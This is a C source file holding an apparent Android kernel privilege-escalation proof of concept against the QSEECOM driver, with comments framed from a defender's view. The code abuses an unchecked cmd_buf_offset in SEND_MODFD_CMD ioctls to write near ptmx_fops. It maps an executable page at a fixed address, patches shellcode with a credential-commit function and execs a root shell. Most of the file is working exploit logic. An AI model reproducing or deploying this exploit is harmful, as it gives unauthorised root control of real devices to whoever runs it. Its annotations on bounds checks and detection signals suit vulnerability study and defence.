/*
 * get_ion - proof-of-concept request against the QSEECOM character device.
 *
 * Registers a 400-byte heap buffer as the shared buffer while reporting its
 * length as 8192, then issues a SEND_MODFD_CMD request whose
 * ifd_data[0].cmd_buf_offset is derived from an arbitrary address rather than
 * from a position inside the command buffer.  The resulting offset lies far
 * outside the 400-byte cmd_req_buf; a driver that validates cmd_buf_offset
 * against cmd_req_len (and the registered shared-buffer range) rejects such a
 * request, and this code depends on that check being absent.
 *
 * @address  address the offset is computed from; the comment below names
 *           ptmx_fops, but what the +14*4 field is cannot be confirmed here.
 * @value    unused.
 * @return   always `true`; open() failure calls exit(-1), every other failure
 *           is only printed.
 *
 * Review notes (defender's view):
 *  - fd and abuseBuff are never released; both leak on the single return path.
 *  - `(int)abuseBuff` truncates a pointer to int, so the offset arithmetic is
 *    only meaningful in a 32-bit process.
 *  - The ioctl return values are printed/ignored, never checked.
 *  - Two PR_SET_NAME renames plus an open of QSEECOM_DEVICE by this process
 *    are the observable side effects worth alerting on.
 */
int get_ion(unsigned long address, int value) {
    printf("mypid %d\n",getpid());
    int ret  = -1;
    int  fd = open(QSEECOM_DEVICE, 0);   // flags 0 == O_RDONLY; fd is never closed
    if (fd<0) {
        perror("open error qseecom");
        exit(-1);
    }

    // Unchecked malloc: 400 bytes allocated, but 8192 are registered as sb_len below.
    void* abuseBuff = malloc(400);
    memset(abuseBuff,0,400);

    int* intArr = (int*)abuseBuff;
    int j = 0;

    // Fill the first 24 words of the request with 1; the meaning of these
    // words to the receiving side is not shown in this file.
    for(j=0; j<24; j++) {
        intArr[j] = 0x1;
    }

    // Not zero-initialised: any field not assigned below stays indeterminate.
    struct qseecom_send_modfd_cmd_req ioctlBuff;

    prctl(PR_SET_NAME, "GodFather", 0, 0, 0);   // first process rename


    // Globals defined elsewhere; presumably read by run_tmp_obtain_root_privilege() — verify.
    g_pid = getpid();
    g_tgid = g_pid;
    prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);   // second process rename

    struct qseecom_set_sb_mem_param_req req;
    req.ifd_data_fd = obtain_dma_buf_fd(8192);   // helper defined elsewhere; return value not checked

    // sb_len (8192) does not match the 400-byte allocation behind virt_sb_base.
    req.virt_sb_base = abuseBuff;
    req.sb_len = 8192;

    ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
    printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);   // printed, not checked

    // The same buffer serves as request and response, so the response
    // overwrites the request words.
    ioctlBuff.cmd_req_buf = abuseBuff;
    ioctlBuff.cmd_req_len = 400;
    ioctlBuff.resp_buf = abuseBuff;
    ioctlBuff.resp_len = 400;
    int i = 0;
    for (i = 0; i<4; i++) {
        ioctlBuff.ifd_data[i].fd = 0;
        ioctlBuff.ifd_data[i].cmd_buf_offset =0;
    }
    ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
    ioctlBuff.ifd_data[0].cmd_buf_offset =   0;   // overwritten on the next assignment

    //c1334e00 b ptmx_fops
    // Offset computed from an external address minus the buffer base: it is
    // not a position inside the 400-byte cmd_req_buf.  This is the value a
    // hardened driver must reject (offset + field size within cmd_req_len).
    ioctlBuff.ifd_data[0].cmd_buf_offset =   (unsigned long)(address + 14*4) - (int)abuseBuff;

    ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);   // return value ignored

    run_tmp_obtain_root_privilege();   // defined elsewhere
    return true;   // requires <stdbool.h> or a project macro; not visible here
}
/*
 * main - standalone variant of the QSEECOM proof-of-concept.
 *
 * Sequence as written:
 *  1. open /dev/qseecom and register a 400-byte heap buffer as an 8192-byte
 *     shared buffer (SET_MEM_PARAM).
 *  2. issue SEND_MODFD_CMD with cmd_buf_offset 0 and read back intArr[0]
 *     from the response.
 *  3. map a fixed RWX anonymous page at the address taken from intArr[0],
 *     copy shell_code2 into it and patch the 0xeeeeeeee marker with the
 *     address of MyCommitCred.
 *  4. issue SEND_MODFD_CMD again with cmd_buf_offset pointing at
 *     PTMX_FOPS + 14*4, i.e. outside the 400-byte command buffer.
 *  5. call run_obtain_root_privilege() and execv /system/bin/sh.
 *
 * Defender notes:
 *  - The second request's cmd_buf_offset is not a position inside cmd_req_buf;
 *    a driver that bounds-checks the offset against cmd_req_len rejects it.
 *  - Observable behaviour: two PR_SET_NAME renames, an open of /dev/qseecom,
 *    a MAP_FIXED|PROT_EXEC anonymous mapping, and an exec of /system/bin/sh.
 *  - PTMX_FOPS, shell_code2, MyCommitCred, g_pid/g_tgid, obtain_dma_buf_fd and
 *    run_obtain_root_privilege are defined elsewhere; PTMX_FOPS is a
 *    build-specific kernel address.
 *  - `printf("%p", intArr[i])` passes int where %p expects a pointer
 *    (format/argument mismatch); `(int)addr` and `(int)abuseBuff` truncate
 *    pointers, so this only works as a 32-bit process.
 *  - fd is never closed and abuseBuff never freed; the fork() at the old
 *    `if(0==fork())` line is commented out, so everything runs in one process.
 *
 * @return 0 if execv returns (i.e. only on exec failure); otherwise the
 *         process image is replaced.
 */
int main(int argc, char *argv[]){

        printf("mypid %d\n",getpid());
        int ret  = -1;

                        int  fd = open("/dev/qseecom", 0);   // O_RDONLY; never closed
                        if (fd<0){
                        	perror("open");
                        	exit(-1);
                        }

                        // Unchecked malloc; 400 bytes, registered below as 8192.
                        void* abuseBuff = malloc(400);
                        memset(abuseBuff,0,400);

                        int* intArr = (int*)abuseBuff;
                        int j = 0;

                        // First 24 request words set to 1; their meaning is not shown here.
                        for(j=0;j<24;j++){

                                        intArr[j] = 0x1;

                        }


                        // Not zero-initialised; unassigned fields stay indeterminate.
                        struct qseecom_send_modfd_cmd_req ioctlBuff;

                        prctl(PR_SET_NAME, "GodFather", 0, 0, 0);   // first rename

                       // if(0==fork()){

                            // Globals defined elsewhere; presumably read by run_obtain_root_privilege() — verify.
                            g_pid = getpid();
                            g_tgid = g_pid;
                            prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);   // second rename

                            //QSEECOM_IOCTL_SET_MEM_PARAM_REQ
                            struct qseecom_set_sb_mem_param_req req;
                            req.ifd_data_fd = obtain_dma_buf_fd(8192);   // return value not checked

                            // sb_len (8192) exceeds the 400-byte allocation behind virt_sb_base.
                            req.virt_sb_base = abuseBuff;
                            req.sb_len = 8192;

                            ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
                            printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);   // printed, not checked

                            // Request and response share one buffer; the response overwrites the request.
                            ioctlBuff.cmd_req_buf = abuseBuff;
                            ioctlBuff.cmd_req_len = 400;
                            ioctlBuff.resp_buf = abuseBuff;
                            ioctlBuff.resp_len = 400;
                            int i = 0;
                            for (i = 0;i<4;i++){
                            	ioctlBuff.ifd_data[i].fd = 0;
                            	ioctlBuff.ifd_data[i].cmd_buf_offset =0;
                            }
                            ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
                            ioctlBuff.ifd_data[0].cmd_buf_offset =   0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;


                                // First request: in-bounds offset 0.  No newline, so this
                                // line may stay buffered if the process is replaced by execv.
                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);   // not checked


                                printf("return %p %p\n",intArr[0],intArr[1]);   // %p with int arguments: format mismatch
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");   // errno may be stale here
                                printf("ioctl return 0x%x \n",ret);

                                //*(int*)intArr[0] = 0x0;
                                // intArr[0], whatever the response left there, is used as a
                                // MAP_FIXED hint for an RWX anonymous page; an int is passed
                                // where mmap expects void*, and the result is not checked.
                                void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
                                printf("mmap return %p \n",addr);

                                // Both stores are dead: the memcpy below overwrites offsets 0..399.
                                *(int*)addr =  0xE3500000;
                                *((int*)((int)addr+4)) = 0xe1a0f00e;
                                memcpy(addr,shell_code2,400);   // shell_code2 defined elsewhere; assumed >= 400 bytes

                                // Replace the 0xeeeeeeee marker with MyCommitCred's address.
                                // Only the first 10 words are scanned.
                                int* arr = (int*)addr;
                                for(i=0;i<10;i++){
                                	if(arr[i] == 0xeeeeeeee)
                                		arr[i] = (int)MyCommitCred;
                                	printf("%p\n",arr[i]);   // %p with an int argument

                                }

                                //c1334e00 b ptmx_fops
                                // Second request: offset derived from a kernel address minus the
                                // buffer base, so it lies outside the 400-byte cmd_req_buf.  A
                                // driver that validates cmd_buf_offset against cmd_req_len
                                // rejects this request.
                                ioctlBuff.ifd_data[0].cmd_buf_offset =   (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;


                                printf("QSEECOM_IOCTL_SEND_CMD_REQ");
                                ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);   // not checked
                                printf("return %p %p\n",intArr[0],intArr[1]);   // %p with int arguments
                                perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
                                printf("ioctl return 0x%x \n",ret);


                                run_obtain_root_privilege();   // defined elsewhere


                                // execv only returns on failure, so the perror branch is the error path.
                                char * argv1[]={"sh",(char *)0};
                               int result =  execv("/system/bin/sh", argv1);
                                if(result){
                                                perror("execv");
                                }

        return 0;


}